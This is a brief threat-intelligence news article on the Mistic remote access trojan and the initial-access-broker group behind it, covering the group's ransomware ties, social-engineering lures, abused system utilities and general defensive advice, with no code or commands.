Mistic RAT: New Cybersecurity Threat Linked to Multiple Ransomware Families

Post Views: 11

New remote access trojan linked to multiple ransomware operations has emerged as a key tool in recent cyberattacks, according to findings from Broadcom’s Symantec and Carbon Black threat research teams.

Threat Group and Tactics

The threat group, identified as Woodgnat and KongTuke, has been active since at least May 2024 and is associated with ransomware families including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Since April 2026, the actors have deployed the Backdoor.Mistic RAT against organizations in sectors such as education, insurance, IT, and professional services. Earlier attacks involved the ModeloRAT, but the shift to Mistic marks a significant evolution in their tactics.

Tools and Techniques

The threat group employs a broad targeting strategy, focusing on opportunistic breaches rather than specific industries. Researchers note that attackers initially cast a wide net to gain access, then evaluate which entities offer the highest value for resale. The Mistic RAT, also known as MLTBackdoor, enables standard malicious activities such as file manipulation, data exfiltration, and system reconnaissance. Attackers execute the malware as a dynamic-link library (DLL) through sideloading techniques. In one instance, they combined Mistic with a credential-stealing module to enhance their access capabilities.

Social Engineering and Lures

Additional tools observed during intrusions include Curl, Reg.exe, Net (net.exe), PowerShell, Certutil, and WMIC. These utilities support tasks like data transfer, registry modifications, network management, command execution, and lateral movement across compromised systems. The group’s methods rely heavily on social engineering, with techniques such as ClickFix, FileFix, and CrashFix designed to trick users into running malicious PowerShell commands.

Technical Analysis and Stages

Researchers highlight that while initial compromises may appear random, the actors conduct detailed system profiling to determine the worth of stolen access before selling it to third parties. Since April 2026, the threat group has also utilized helpdesk and IT-support lures distributed through Microsoft Teams to entice victims into executing malicious payloads. This approach leverages trusted communication channels to bypass traditional security measures.

Implications and Recommendations

The actors have previously exploited compromised WordPress sites to distribute malware, further expanding their attack surface. Technical analysis reveals that the group’s operations involve multiple stages, beginning with initial access and progressing to data extraction and potential ransomware deployment. The use of widely available system tools like PowerShell and WMIC underscores the challenge of detecting such intrusions through conventional means. Researchers emphasize the importance of monitoring for unusual command-line activity and unauthorized use of administrative utilities.

Initial Access Brokers and Security Measures

The emergence of Mistic highlights the growing sophistication of initial access brokers, who act as intermediaries between threat actors and ransomware groups. By providing access to vulnerable systems, these brokers enable ransomware operators to maximize their financial gains while minimizing direct exposure. The persistence of such tactics underscores the need for organizations to strengthen endpoint security, implement strict access controls, and conduct regular threat hunting exercises.